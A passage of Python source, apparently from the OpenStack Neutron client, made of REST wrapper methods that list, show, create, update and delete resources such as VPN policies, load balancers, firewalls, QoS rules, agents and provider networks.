**_params)
def show_ipsec_site_connection(self, ipsecsite_conn, **_params):
"""Fetches information of a specific IPsecSiteConnection."""
return self.get(
self.ipsec_site_connection_path % (ipsecsite_conn), params=_params
)
def create_ipsec_site_connection(self, body=None):
"""Creates a new IPsecSiteConnection."""
return self.post(self.ipsec_site_connections_path, body=body)
def update_ipsec_site_connection(self, ipsecsite_conn, body=None):
"""Updates an IPsecSiteConnection."""
return self.put(
self.ipsec_site_connection_path % (ipsecsite_conn), body=body
)
def delete_ipsec_site_connection(self, ipsecsite_conn):
"""Deletes the specified IPsecSiteConnection."""
return self.delete(self.ipsec_site_connection_path % (ipsecsite_conn))
def list_ikepolicies(self, retrieve_all=True, **_params):
"""Fetches a list of all configured IKEPolicies for a project."""
return self.list('ikepolicies', self.ikepolicies_path, retrieve_all,
**_params)
def show_ikepolicy(self, ikepolicy, **_params):
"""Fetches information of a specific IKEPolicy."""
return self.get(self.ikepolicy_path % (ikepolicy), params=_params)
def create_ikepolicy(self, body=None):
"""Creates a new IKEPolicy."""
return self.post(self.ikepolicies_path, body=body)
def update_ikepolicy(self, ikepolicy, body=None):
"""Updates an IKEPolicy."""
return self.put(self.ikepolicy_path % (ikepolicy), body=body)
def delete_ikepolicy(self, ikepolicy):
"""Deletes the specified IKEPolicy."""
return self.delete(self.ikepolicy_path % (ikepolicy))
def list_ipsecpolicies(self, retrieve_all=True, **_params):
"""Fetches a list of all configured IPsecPolicies for a project."""
return self.list('ipsecpolicies',
self.ipsecpolicies_path,
retrieve_all,
**_params)
def show_ipsecpolicy(self, ipsecpolicy, **_params):
"""Fetches information of a specific IPsecPolicy."""
return self.get(self.ipsecpolicy_path % (ipsecpolicy), params=_params)
def create_ipsecpolicy(self, body=None):
"""Creates a new IPsecPolicy."""
return self.post(self.ipsecpolicies_path, body=body)
def update_ipsecpolicy(self, ipsecpolicy, body=None):
"""Updates an IPsecPolicy."""
return self.put(self.ipsecpolicy_path % (ipsecpolicy), body=body)
def delete_ipsecpolicy(self, ipsecpolicy):
"""Deletes the specified IPsecPolicy."""
return self.delete(self.ipsecpolicy_path % (ipsecpolicy))
def list_loadbalancers(self, retrieve_all=True, **_params):
"""Fetches a list of all loadbalancers for a project."""
return self.list('loadbalancers', self.lbaas_loadbalancers_path,
retrieve_all, **_params)
def show_loadbalancer(self, lbaas_loadbalancer, **_params):
"""Fetches information for a load balancer."""
return self.get(self.lbaas_loadbalancer_path % (lbaas_loadbalancer),
params=_params)
def create_loadbalancer(self, body=None):
"""Creates a new load balancer."""
return self.post(self.lbaas_loadbalancers_path, body=body)
def update_loadbalancer(self, lbaas_loadbalancer, body=None):
"""Updates a load balancer."""
return self.put(self.lbaas_loadbalancer_path % (lbaas_loadbalancer),
body=body)
def delete_loadbalancer(self, lbaas_loadbalancer):
"""Deletes the specified load balancer."""
return self.delete(self.lbaas_loadbalancer_path %
(lbaas_loadbalancer))
def retrieve_loadbalancer_stats(self, loadbalancer, **_params):
"""Retrieves stats for a certain load balancer."""
return self.get(self.lbaas_loadbalancer_path_stats % (loadbalancer),
params=_params)
def retrieve_loadbalancer_status(self, loadbalancer, **_params):
"""Retrieves status for a certain load balancer."""
return self.get(self.lbaas_loadbalancer_path_status % (loadbalancer),
params=_params)
def list_listeners(self, retrieve_all=True, **_params):
"""Fetches a list of all lbaas_listeners for a project."""
return self.list('listeners', self.lbaas_listeners_path,
retrieve_all, **_params)
def show_listener(self, lbaas_listener, **_params):
"""Fetches information for a lbaas_listener."""
return self.get(self.lbaas_listener_path % (lbaas_listener),
params=_params)
def create_listener(self, body=None):
"""Creates a new lbaas_listener."""
return self.post(self.lbaas_listeners_path, body=body)
def update_listener(self, lbaas_listener, body=None):
"""Updates a lbaas_listener."""
return self.put(self.lbaas_listener_path % (lbaas_listener),
body=body)
def delete_listener(self, lbaas_listener):
"""Deletes the specified lbaas_listener."""
return self.delete(self.lbaas_listener_path % (lbaas_listener))
def list_lbaas_l7policies(self, retrieve_all=True, **_params):
"""Fetches a list of all L7 policies for a listener."""
return self.list('l7policies', self.lbaas_l7policies_path,
retrieve_all, **_params)
def show_lbaas_l7policy(self, l7policy, **_params):
"""Fetches information of a certain listener's L7 policy."""
return self.get(self.lbaas_l7policy_path % l7policy,
params=_params)
def create_lbaas_l7policy(self, body=None):
"""Creates L7 policy for a certain listener."""
return self.post(self.lbaas_l7policies_path, body=body)
def update_lbaas_l7policy(self, l7policy, body=None):
"""Updates L7 policy."""
return self.put(self.lbaas_l7policy_path % l7policy,
body=body)
def delete_lbaas_l7policy(self, l7policy):
"""Deletes the specified L7 policy."""
return self.delete(self.lbaas_l7policy_path % l7policy)
def list_lbaas_l7rules(self, l7policy, retrieve_all=True, **_params):
"""Fetches a list of all rules for L7 policy."""
return self.list('rules', self.lbaas_l7rules_path % l7policy,
retrieve_all, **_params)
def show_lbaas_l7rule(self, l7rule, l7policy, **_params):
"""Fetches information of a certain L7 policy's rule."""
return self.get(self.lbaas_l7rule_path % (l7policy, l7rule),
params=_params)
def create_lbaas_l7rule(self, l7policy, body=None):
"""Creates rule for a certain L7 policy."""
return self.post(self.lbaas_l7rules_path % l7policy, body=body)
def update_lbaas_l7rule(self, l7rule, l7policy, body=None):
"""Updates L7 rule."""
return self.put(self.lbaas_l7rule_path % (l7policy, l7rule),
body=body)
def delete_lbaas_l7rule(self, l7rule, l7policy):
"""Deletes the specified L7 rule."""
return self.delete(self.lbaas_l7rule_path % (l7policy, l7rule))
def list_lbaas_pools(self, retrieve_all=True, **_params):
"""Fetches a list of all lbaas_pools for a project."""
return self.list('pools', self.lbaas_pools_path,
retrieve_all, **_params)
def show_lbaas_pool(self, lbaas_pool, **_params):
"""Fetches information for a lbaas_pool."""
return self.get(self.lbaas_pool_path % (lbaas_pool),
params=_params)
def create_lbaas_pool(self, body=None):
"""Creates a new lbaas_pool."""
return self.post(self.lbaas_pools_path, body=body)
def update_lbaas_pool(self, lbaas_pool, body=None):
"""Updates a lbaas_pool."""
return self.put(self.lbaas_pool_path % (lbaas_pool),
body=body)
def delete_lbaas_pool(self, lbaas_pool):
"""Deletes the specified lbaas_pool."""
return self.delete(self.lbaas_pool_path % (lbaas_pool))
def list_lbaas_healthmonitors(self, retrieve_all=True, **_params):
"""Fetches a list of all lbaas_healthmonitors for a project."""
return self.list('healthmonitors', self.lbaas_healthmonitors_path,
retrieve_all, **_params)
def show_lbaas_healthmonitor(self, lbaas_healthmonitor, **_params):
"""Fetches information for a lbaas_healthmonitor."""
return self.get(self.lbaas_healthmonitor_path % (lbaas_healthmonitor),
params=_params)
def create_lbaas_healthmonitor(self, body=None):
"""Creates a new lbaas_healthmonitor."""
return self.post(self.lbaas_healthmonitors_path, body=body)
def update_lbaas_healthmonitor(self, lbaas_healthmonitor, body=None):
"""Updates a lbaas_healthmonitor."""
return self.put(self.lbaas_healthmonitor_path % (lbaas_healthmonitor),
body=body)
def delete_lbaas_healthmonitor(self, lbaas_healthmonitor):
"""Deletes the specified lbaas_healthmonitor."""
return self.delete(self.lbaas_healthmonitor_path %
(lbaas_healthmonitor))
def list_lbaas_loadbalancers(self, retrieve_all=True, **_params):
"""Fetches a list of all lbaas_loadbalancers for a project."""
return self.list('loadbalancers', self.lbaas_loadbalancers_path,
retrieve_all, **_params)
def list_lbaas_members(self, lbaas_pool, retrieve_all=True, **_params):
"""Fetches a list of all lbaas_members for a project."""
return self.list('members', self.lbaas_members_path % lbaas_pool,
retrieve_all, **_params)
def show_lbaas_member(self, lbaas_member, lbaas_pool, **_params):
"""Fetches information of a certain lbaas_member."""
return self.get(self.lbaas_member_path % (lbaas_pool, lbaas_member),
params=_params)
def create_lbaas_member(self, lbaas_pool, body=None):
"""Creates a lbaas_member."""
return self.post(self.lbaas_members_path % lbaas_pool, body=body)
def update_lbaas_member(self, lbaas_member, lbaas_pool, body=None):
"""Updates a lbaas_member."""
return self.put(self.lbaas_member_path % (lbaas_pool, lbaas_member),
body=body)
def delete_lbaas_member(self, lbaas_member, lbaas_pool):
"""Deletes the specified lbaas_member."""
return self.delete(self.lbaas_member_path % (lbaas_pool, lbaas_member))
def list_vips(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer vips for a project."""
# Pass filters in "params" argument to do_request
return self.list('vips', self.vips_path, retrieve_all,
**_params)
def show_vip(self, vip, **_params):
"""Fetches information of a certain load balancer vip."""
return self.get(self.vip_path % (vip), params=_params)
def create_vip(self, body=None):
"""Creates a new load balancer vip."""
return self.post(self.vips_path, body=body)
def update_vip(self, vip, body=None):
"""Updates a load balancer vip."""
return self.put(self.vip_path % (vip), body=body)
def delete_vip(self, vip):
"""Deletes the specified load balancer vip."""
return self.delete(self.vip_path % (vip))
def list_pools(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer pools for a project."""
# Pass filters in "params" argument to do_request
return self.list('pools', self.pools_path, retrieve_all,
**_params)
def show_pool(self, pool, **_params):
"""Fetches information of a certain load balancer pool."""
return self.get(self.pool_path % (pool), params=_params)
def create_pool(self, body=None):
"""Creates a new load balancer pool."""
return self.post(self.pools_path, body=body)
def update_pool(self, pool, body=None):
"""Updates a load balancer pool."""
return self.put(self.pool_path % (pool), body=body)
def delete_pool(self, pool):
"""Deletes the specified load balancer pool."""
return self.delete(self.pool_path % (pool))
def retrieve_pool_stats(self, pool, **_params):
"""Retrieves stats for a certain load balancer pool."""
return self.get(self.pool_path_stats % (pool), params=_params)
def list_members(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer members for a project."""
# Pass filters in "params" argument to do_request
return self.list('members', self.members_path, retrieve_all,
**_params)
def show_member(self, member, **_params):
"""Fetches information of a certain load balancer member."""
return self.get(self.member_path % (member), params=_params)
def create_member(self, body=None):
"""Creates a new load balancer member."""
return self.post(self.members_path, body=body)
def update_member(self, member, body=None):
"""Updates a load balancer member."""
return self.put(self.member_path % (member), body=body)
def delete_member(self, member):
"""Deletes the specified load balancer member."""
return self.delete(self.member_path % (member))
def list_health_monitors(self, retrieve_all=True, **_params):
"""Fetches a list of all load balancer health monitors for a project.
"""
# Pass filters in "params" argument to do_request
return self.list('health_monitors', self.health_monitors_path,
retrieve_all, **_params)
def show_health_monitor(self, health_monitor, **_params):
"""Fetches information of a certain load balancer health monitor."""
return self.get(self.health_monitor_path % (health_monitor),
params=_params)
def create_health_monitor(self, body=None):
"""Creates a new load balancer health monitor."""
return self.post(self.health_monitors_path, body=body)
def update_health_monitor(self, health_monitor, body=None):
"""Updates a load balancer health monitor."""
return self.put(self.health_monitor_path % (health_monitor), body=body)
def delete_health_monitor(self, health_monitor):
"""Deletes the specified load balancer health monitor."""
return self.delete(self.health_monitor_path % (health_monitor))
def associate_health_monitor(self, pool, body):
"""Associate specified load balancer health monitor and pool."""
return self.post(self.associate_pool_health_monitors_path % (pool),
body=body)
def disassociate_health_monitor(self, pool, health_monitor):
"""Disassociate specified load balancer health monitor and pool."""
path = (self.disassociate_pool_health_monitors_path %
{'pool': pool, 'health_monitor': health_monitor})
return self.delete(path)
def create_qos_queue(self, body=None):
"""Creates a new queue."""
return self.post(self.qos_queues_path, body=body)
def list_qos_queues(self, **_params):
"""Fetches a list of all queues for a project."""
return self.get(self.qos_queues_path, params=_params)
def show_qos_queue(self, queue, **_params):
"""Fetches information of a certain queue."""
return self.get(self.qos_queue_path % (queue),
params=_params)
def delete_qos_queue(self, queue):
"""Deletes the specified queue."""
return self.delete(self.qos_queue_path % (queue))
def list_agents(self, **_params):
"""Fetches agents."""
# Pass filters in "params" argument to do_request
return self.get(self.agents_path, params=_params)
def show_agent(self, agent, **_params):
"""Fetches information of a certain agent."""
return self.get(self.agent_path % (agent), params=_params)
def update_agent(self, agent, body=None):
"""Updates an agent."""
return self.put(self.agent_path % (agent), body=body)
def delete_agent(self, agent):
"""Deletes the specified agent."""
return self.delete(self.agent_path % (agent))
def list_hosts(self, **_params):
"""Fetches hosts running neutron services."""
# Pass filters in "params" argument to do_request
return self.get(self.hosts_path, params=_params)
def show_host(self, host, **_params):
"""Fetches information of a certain host."""
return self.get(self.host_path % (host), params=_params)
def create_host(self, body=None):
"""Creates a new host record."""
return self.post(self.hosts_path, body=body)
def update_host(self, host, body=None):
"""Updates availability of a given host."""
return self.put(self.host_path % (host), body=body)
def delete_host(self, host, body=None):
"""Delete host record and related agents for a given host."""
return self.delete(self.host_path % (host), body=body)
def host_bind_interface(self, host_id, body=None):
"""Bind interface on host to a set of provider networks."""
return self.put(self.host_bind_path % (host_id), body=body)
def host_unbind_interface(self, host_id, body=None):
"""Unbind interface on host from all provider networks."""
return self.put(self.host_unbind_path % (host_id), body=body)
def list_network_gateways(self, **_params):
"""Retrieve network gateways."""
return self.get(self.network_gateways_path, params=_params)
def show_network_gateway(self, gateway_id, **_params):
"""Fetch a network gateway."""
return self.get(self.network_gateway_path % gateway_id, params=_params)
def create_network_gateway(self, body=None):
"""Create a new network gateway."""
return self.post(self.network_gateways_path, body=body)
def update_network_gateway(self, gateway_id, body=None):
"""Update a network gateway."""
return self.put(self.network_gateway_path % gateway_id, body=body)
def delete_network_gateway(self, gateway_id):
"""Delete the specified network gateway."""
return self.delete(self.network_gateway_path % gateway_id)
def connect_network_gateway(self, gateway_id, body=None):
"""Connect a network gateway to the specified network."""
base_uri = self.network_gateway_path % gateway_id
return self.put("%s/connect_network" % base_uri, body=body)
def disconnect_network_gateway(self, gateway_id, body=None):
"""Disconnect a network from the specified gateway."""
base_uri = self.network_gateway_path % gateway_id
return self.put("%s/disconnect_network" % base_uri, body=body)
def list_gateway_devices(self, **_params):
"""Retrieve gateway devices."""
return self.get(self.gateway_devices_path, params=_params)
def show_gateway_device(self, gateway_device_id, **_params):
"""Fetch a gateway device."""
return self.get(self.gateway_device_path % gateway_device_id,
params=_params)
def create_gateway_device(self, body=None):
"""Create a new gateway device."""
return self.post(self.gateway_devices_path, body=body)
def update_gateway_device(self, gateway_device_id, body=None):
"""Updates a new gateway device."""
return self.put(self.gateway_device_path % gateway_device_id,
body=body)
def delete_gateway_device(self, gateway_device_id):
"""Delete the specified gateway device."""
return self.delete(self.gateway_device_path % gateway_device_id)
def list_dhcp_agent_hosting_networks(self, network, **_params):
"""Fetches a list of dhcp agents hosting a network."""
return self.get((self.network_path + self.DHCP_AGENTS) % network,
params=_params)
def list_networks_on_dhcp_agent(self, dhcp_agent, **_params):
"""Fetches a list of dhcp agents hosting a network."""
return self.get((self.agent_path + self.DHCP_NETS) % dhcp_agent,
params=_params)
def add_network_to_dhcp_agent(self, dhcp_agent, body=None):
"""Adds a network to dhcp agent."""
return self.post((self.agent_path + self.DHCP_NETS) % dhcp_agent,
body=body)
def remove_network_from_dhcp_agent(self, dhcp_agent, network_id):
"""Remove a network from dhcp agent."""
return self.delete((self.agent_path + self.DHCP_NETS + "/%s") % (
dhcp_agent, network_id))
def list_l3_agent_hosting_routers(self, router, **_params):
"""Fetches a list of L3 agents hosting a router."""
return self.get((self.router_path + self.L3_AGENTS) % router,
params=_params)
def list_routers_on_l3_agent(self, l3_agent, **_params):
"""Fetches a list of L3 agents hosting a router."""
return self.get((self.agent_path + self.L3_ROUTERS) % l3_agent,
params=_params)
def add_router_to_l3_agent(self, l3_agent, body):
"""Adds a router to L3 agent."""
return self.post((self.agent_path + self.L3_ROUTERS) % l3_agent,
body=body)
def list_dragents_hosting_bgp_speaker(self, bgp_speaker, **_params):
"""Fetches a list of Dynamic Routing agents hosting a BGP speaker."""
return self.get((self.bgp_speaker_path + self.BGP_DRAGENTS)
% bgp_speaker, params=_params)
def add_bgp_speaker_to_dragent(self, bgp_dragent, body):
"""Adds a BGP speaker to Dynamic Routing agent."""
return self.post((self.agent_path + self.BGP_DRINSTANCES)
% bgp_dragent, body=body)
def remove_bgp_speaker_from_dragent(self, bgp_dragent, bgpspeaker_id):
"""Removes a BGP speaker from Dynamic Routing agent."""
return self.delete((self.agent_path + self.BGP_DRINSTANCES + "/%s")
% (bgp_dragent, bgpspeaker_id))
def list_bgp_speaker_on_dragent(self, bgp_dragent, **_params):
"""Fetches a list of BGP speakers hosted by Dynamic Routing agent."""
return self.get((self.agent_path + self.BGP_DRINSTANCES)
% bgp_dragent, params=_params)
def list_firewall_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall rules for a project."""
# Pass filters in "params" argument to do_request
return self.list('firewall_rules', self.firewall_rules_path,
retrieve_all, **_params)
def show_firewall_rule(self, firewall_rule, **_params):
"""Fetches information of a certain firewall rule."""
return self.get(self.firewall_rule_path % (firewall_rule),
params=_params)
def create_firewall_rule(self, body=None):
"""Creates a new firewall rule."""
return self.post(self.firewall_rules_path, body=body)
def update_firewall_rule(self, firewall_rule, body=None):
"""Updates a firewall rule."""
return self.put(self.firewall_rule_path % (firewall_rule), body=body)
def delete_firewall_rule(self, firewall_rule):
"""Deletes the specified firewall rule."""
return self.delete(self.firewall_rule_path % (firewall_rule))
def list_firewall_policies(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall policies for a project."""
# Pass filters in "params" argument to do_request
return self.list('firewall_policies', self.firewall_policies_path,
retrieve_all, **_params)
def show_firewall_policy(self, firewall_policy, **_params):
"""Fetches information of a certain firewall policy."""
return self.get(self.firewall_policy_path % (firewall_policy),
params=_params)
def create_firewall_policy(self, body=None):
"""Creates a new firewall policy."""
return self.post(self.firewall_policies_path, body=body)
def update_firewall_policy(self, firewall_policy, body=None):
"""Updates a firewall policy."""
return self.put(self.firewall_policy_path % (firewall_policy),
body=body)
def delete_firewall_policy(self, firewall_policy):
"""Deletes the specified firewall policy."""
return self.delete(self.firewall_policy_path % (firewall_policy))
def firewall_policy_insert_rule(self, firewall_policy, body=None):
"""Inserts specified rule into firewall policy."""
return self.put(self.firewall_policy_insert_path % (firewall_policy),
body=body)
def firewall_policy_remove_rule(self, firewall_policy, body=None):
"""Removes specified rule from firewall policy."""
return self.put(self.firewall_policy_remove_path % (firewall_policy),
body=body)
def list_firewalls(self, retrieve_all=True, **_params):
"""Fetches a list of all firewalls for a project."""
# Pass filters in "params" argument to do_request
return self.list('firewalls', self.firewalls_path, retrieve_all,
**_params)
def show_firewall(self, firewall, **_params):
"""Fetches information of a certain firewall."""
return self.get(self.firewall_path % (firewall), params=_params)
def create_firewall(self, body=None):
"""Creates a new firewall."""
return self.post(self.firewalls_path, body=body)
def update_firewall(self, firewall, body=None):
"""Updates a firewall."""
return self.put(self.firewall_path % (firewall), body=body)
def delete_firewall(self, firewall):
"""Deletes the specified firewall."""
return self.delete(self.firewall_path % (firewall))
def list_fwaas_firewall_groups(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall groups for a project"""
return self.list('firewall_groups', self.fwaas_firewall_groups_path,
retrieve_all, **_params)
def show_fwaas_firewall_group(self, fwg, **_params):
"""Fetches information of a certain firewall group"""
return self.get(self.fwaas_firewall_group_path % (fwg), params=_params)
def create_fwaas_firewall_group(self, body=None):
"""Creates a new firewall group"""
return self.post(self.fwaas_firewall_groups_path, body=body)
def update_fwaas_firewall_group(self, fwg, body=None):
"""Updates a firewall group"""
return self.put(self.fwaas_firewall_group_path % (fwg), body=body)
def delete_fwaas_firewall_group(self, fwg):
"""Deletes the specified firewall group"""
return self.delete(self.fwaas_firewall_group_path % (fwg))
def list_fwaas_firewall_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall rules for a project"""
# Pass filters in "params" argument to do_request
return self.list('firewall_rules', self.fwaas_firewall_rules_path,
retrieve_all, **_params)
def show_fwaas_firewall_rule(self, firewall_rule, **_params):
"""Fetches information of a certain firewall rule"""
return self.get(self.fwaas_firewall_rule_path % (firewall_rule),
params=_params)
def create_fwaas_firewall_rule(self, body=None):
"""Creates a new firewall rule"""
return self.post(self.fwaas_firewall_rules_path, body=body)
def update_fwaas_firewall_rule(self, firewall_rule, body=None):
"""Updates a firewall rule"""
return self.put(self.fwaas_firewall_rule_path % (firewall_rule),
body=body)
def delete_fwaas_firewall_rule(self, firewall_rule):
"""Deletes the specified firewall rule"""
return self.delete(self.fwaas_firewall_rule_path % (firewall_rule))
def list_fwaas_firewall_policies(self, retrieve_all=True, **_params):
"""Fetches a list of all firewall policies for a project"""
# Pass filters in "params" argument to do_request
return self.list('firewall_policies',
self.fwaas_firewall_policies_path,
retrieve_all, **_params)
def show_fwaas_firewall_policy(self, firewall_policy, **_params):
"""Fetches information of a certain firewall policy"""
return self.get(self.fwaas_firewall_policy_path % (firewall_policy),
params=_params)
def create_fwaas_firewall_policy(self, body=None):
"""Creates a new firewall policy"""
return self.post(self.fwaas_firewall_policies_path, body=body)
def update_fwaas_firewall_policy(self, firewall_policy, body=None):
"""Updates a firewall policy"""
return self.put(self.fwaas_firewall_policy_path % (firewall_policy),
body=body)
def delete_fwaas_firewall_policy(self, firewall_policy):
"""Deletes the specified firewall policy"""
return self.delete(self.fwaas_firewall_policy_path % (firewall_policy))
def insert_rule_fwaas_firewall_policy(self, firewall_policy, body=None):
"""Inserts specified rule into firewall policy"""
return self.put((self.fwaas_firewall_policy_insert_path %
(firewall_policy)), body=body)
def remove_rule_fwaas_firewall_policy(self, firewall_policy, body=None):
"""Removes specified rule from firewall policy"""
return self.put((self.fwaas_firewall_policy_remove_path %
(firewall_policy)), body=body)
def remove_router_from_l3_agent(self, l3_agent, router_id):
"""Remove a router from l3 agent."""
return self.delete((self.agent_path + self.L3_ROUTERS + "/%s") % (
l3_agent, router_id))
def get_lbaas_agent_hosting_pool(self, pool, **_params):
"""Fetches a loadbalancer agent hosting a pool."""
return self.get((self.pool_path + self.LOADBALANCER_AGENT) % pool,
params=_params)
def list_pools_on_lbaas_agent(self, lbaas_agent, **_params):
"""Fetches a list of pools hosted by the loadbalancer agent."""
return self.get((self.agent_path + self.LOADBALANCER_POOLS) %
lbaas_agent, params=_params)
def get_lbaas_agent_hosting_loadbalancer(self, loadbalancer, **_params):
"""Fetches a loadbalancer agent hosting a loadbalancer."""
return self.get((self.lbaas_loadbalancer_path +
self.LOADBALANCER_HOSTING_AGENT) % loadbalancer,
params=_params)
def list_loadbalancers_on_lbaas_agent(self, lbaas_agent, **_params):
"""Fetches a list of loadbalancers hosted by the loadbalancer agent."""
return self.get((self.agent_path + self.AGENT_LOADBALANCERS) %
lbaas_agent, params=_params)
def list_service_providers(self, retrieve_all=True, **_params):
"""Fetches service providers."""
# Pass filters in "params" argument to do_request
return self.list('service_providers', self.service_providers_path,
retrieve_all, **_params)
def create_metering_label(self, body=None):
"""Creates a metering label."""
return self.post(self.metering_labels_path, body=body)
def delete_metering_label(self, label):
"""Deletes the specified metering label."""
return self.delete(self.metering_label_path % (label))
def list_metering_labels(self, retrieve_all=True, **_params):
"""Fetches a list of all metering labels for a project."""
return self.list('metering_labels', self.metering_labels_path,
retrieve_all, **_params)
def show_metering_label(self, metering_label, **_params):
"""Fetches information of a certain metering label."""
return self.get(self.metering_label_path %
(metering_label), params=_params)
def create_metering_label_rule(self, body=None):
"""Creates a metering label rule."""
return self.post(self.metering_label_rules_path, body=body)
def delete_metering_label_rule(self, rule):
"""Deletes the specified metering label rule."""
return self.delete(self.metering_label_rule_path % (rule))
def list_metering_label_rules(self, retrieve_all=True, **_params):
"""Fetches a list of all metering label rules for a label."""
return self.list('metering_label_rules',
self.metering_label_rules_path, retrieve_all,
**_params)
def show_metering_label_rule(self, metering_label_rule, **_params):
"""Fetches information of a certain metering label rule."""
return self.get(self.metering_label_rule_path %
(metering_label_rule), params=_params)
def create_rbac_policy(self, body=None):
"""Create a new RBAC policy."""
return self.post(self.rbac_policies_path, body=body)
def update_rbac_policy(self, rbac_policy_id, body=None):
"""Update a RBAC policy."""
return self.put(self.rbac_policy_path % rbac_policy_id, body=body)
def list_rbac_policies(self, retrieve_all=True, **_params):
"""Fetch a list of all RBAC policies for a project."""
return self.list('rbac_policies', self.rbac_policies_path,
retrieve_all, **_params)
def show_rbac_policy(self, rbac_policy_id, **_params):
"""Fetch information of a certain RBAC policy."""
return self.get(self.rbac_policy_path % rbac_policy_id,
params=_params)
def delete_rbac_policy(self, rbac_policy_id):
"""Delete the specified RBAC policy."""
return self.delete(self.rbac_policy_path % rbac_policy_id)
def list_qos_policies(self, retrieve_all=True, **_params):
"""Fetches a list of all qos policies for a project."""
# Pass filters in "params" argument to do_request
return self.list('policies', self.qos_policies_path,
retrieve_all, **_params)
def show_qos_policy(self, qos_policy, **_params):
"""Fetches information of a certain qos policy."""
return self.get(self.qos_policy_path % qos_policy,
params=_params)
def create_qos_policy(self, body=None):
"""Creates a new qos policy."""
return self.post(self.qos_policies_path, body=body)
def update_qos_policy(self, qos_policy, body=None):
"""Updates a qos policy."""
return self.put(self.qos_policy_path % qos_policy,
body=body)
def delete_qos_policy(self, qos_policy):
"""Deletes the specified qos policy."""
return self.delete(self.qos_policy_path % qos_policy)
def list_qos_rule_types(self, retrieve_all=True, **_params):
"""List available qos rule types."""
return self.list('rule_types', self.qos_rule_types_path,
retrieve_all, **_params)
def list_bandwidth_limit_rules(self, policy_id,
retrieve_all=True, **_params):
"""Fetches a list of all bandwidth limit rules for the given policy."""
return self.list('bandwidth_limit_rules',
self.qos_bandwidth_limit_rules_path % policy_id,
retrieve_all, **_params)
def show_bandwidth_limit_rule(self, rule, policy, **_params):
"""Fetches information of a certain bandwidth limit rule."""
return self.get(self.qos_bandwidth_limit_rule_path %
(policy, rule), params=_params)
def create_bandwidth_limit_rule(self, policy, body=None):
"""Creates a new bandwidth limit rule."""
return self.post(self.qos_bandwidth_limit_rules_path % policy,
body=body)
def update_bandwidth_limit_rule(self, rule, policy, body=None):
"""Updates a bandwidth limit rule."""
return self.put(self.qos_bandwidth_limit_rule_path %
(policy, rule), body=body)
def delete_bandwidth_limit_rule(self, rule, policy):
"""Deletes a bandwidth limit rule."""
return self.delete(self.qos_bandwidth_limit_rule_path %
(policy, rule))
def list_dscp_marking_rules(self, policy_id,
retrieve_all=True, **_params):
"""Fetches a list of all DSCP marking rules for the given policy."""
return self.list('dscp_marking_rules',
self.qos_dscp_marking_rules_path % policy_id,
retrieve_all, **_params)
def show_dscp_marking_rule(self, rule, policy, **_params):
"""Shows information of a certain DSCP marking rule."""
return self.get(self.qos_dscp_marking_rule_path %
(policy, rule), params=_params)
def create_dscp_marking_rule(self, policy, body=None):
"""Creates a new DSCP marking rule."""
return self.post(self.qos_dscp_marking_rules_path % policy,
body=body)
def update_dscp_marking_rule(self, rule, policy, body=None):
"""Updates a DSCP marking rule."""
return self.put(self.qos_dscp_marking_rule_path %
(policy, rule), body=body)
def delete_dscp_marking_rule(self, rule, policy):
"""Deletes a DSCP marking rule."""
return self.delete(self.qos_dscp_marking_rule_path %
(policy, rule))
def list_minimum_bandwidth_rules(self, policy_id, retrieve_all=True,
**_params):
"""Fetches a list of all minimum bandwidth rules for the given policy.
"""
return self.list('minimum_bandwidth_rules',
self.qos_minimum_bandwidth_rules_path %
policy_id, retrieve_all, **_params)
def show_minimum_bandwidth_rule(self, rule, policy, body=None):
"""Fetches information of a certain minimum bandwidth rule."""
return self.get(self.qos_minimum_bandwidth_rule_path %
(policy, rule), body=body)
def create_minimum_bandwidth_rule(self, policy, body=None):
"""Creates a new minimum bandwidth rule."""
return self.post(self.qos_minimum_bandwidth_rules_path % policy,
body=body)
def update_minimum_bandwidth_rule(self, rule, policy, body=None):
"""Updates a minimum bandwidth rule."""
return self.put(self.qos_minimum_bandwidth_rule_path %
(policy, rule), body=body)
def delete_minimum_bandwidth_rule(self, rule, policy):
"""Deletes a minimum bandwidth rule."""
return self.delete(self.qos_minimum_bandwidth_rule_path %
(policy, rule))
def create_flavor(self, body=None):
"""Creates a new Neutron service flavor."""
return self.post(self.flavors_path, body=body)
def delete_flavor(self, flavor):
"""Deletes the specified Neutron service flavor."""
return self.delete(self.flavor_path % (flavor))
def list_flavors(self, retrieve_all=True, **_params):
"""Fetches a list of all Neutron service flavors for a project."""
return self.list('flavors', self.flavors_path, retrieve_all,
**_params)
def show_flavor(self, flavor, **_params):
"""Fetches information for a certain Neutron service flavor."""
return self.get(self.flavor_path % (flavor), params=_params)
def update_flavor(self, flavor, body):
"""Update a Neutron service flavor."""
return self.put(self.flavor_path % (flavor), body=body)
def associate_flavor(self, flavor, body):
"""Associate a Neutron service flavor with a profile."""
return self.post(self.flavor_profile_bindings_path %
(flavor), body=body)
def disassociate_flavor(self, flavor, flavor_profile):
"""Disassociate a Neutron service flavor with a profile."""
return self.delete(self.flavor_profile_binding_path %
(flavor, flavor_profile))
def create_service_profile(self, body=None):
"""Creates a new Neutron service flavor profile."""
return self.post(self.service_profiles_path, body=body)
def delete_service_profile(self, flavor_profile):
"""Deletes the specified Neutron service flavor profile."""
return self.delete(self.service_profile_path % (flavor_profile))
def list_service_profiles(self, retrieve_all=True, **_params):
"""Fetches a list of all Neutron service flavor profiles."""
return self.list('service_profiles', self.service_profiles_path,
retrieve_all, **_params)
def list_providernet_types(self, retrieve_all=True, **_params):
"""Fetches a list of all supported provider network types."""
# Pass filters in "params" argument to do_request
return self.list('providernet_types',
self.providernet_types_path, retrieve_all,
**_params)
def list_providernets(self, retrieve_all=True, **_params):
"""Fetches a list of all provider networks."""
# Pass filters in "params" argument to do_request
return self.list('providernets', self.providernets_path, retrieve_all,
**_params)
def list_networks_on_providernet(self, id, **_params):
"""Fetches a list of networks hosted by provider networks."""
return self.get((self.providernet_path + self.PNET_BINDINGS) % id,
params=_params)
def show_providernet(self, providernet, **_params):
"""Fetches information of a certain provider network."""
return self.get(self.providernet_path % (providernet), params=_params)
def create_providernet(self, body=None):
"""Creates a new provider network."""
return self.post(self.providernets_path, body=body)
def update_providernet(self, providernet, body=None):
"""Updates a provider network."""
return self.put(self.providernet_path % (providernet), body=body)
def delete_providernet(self, providernet):
"""Deletes the specified provider network."""
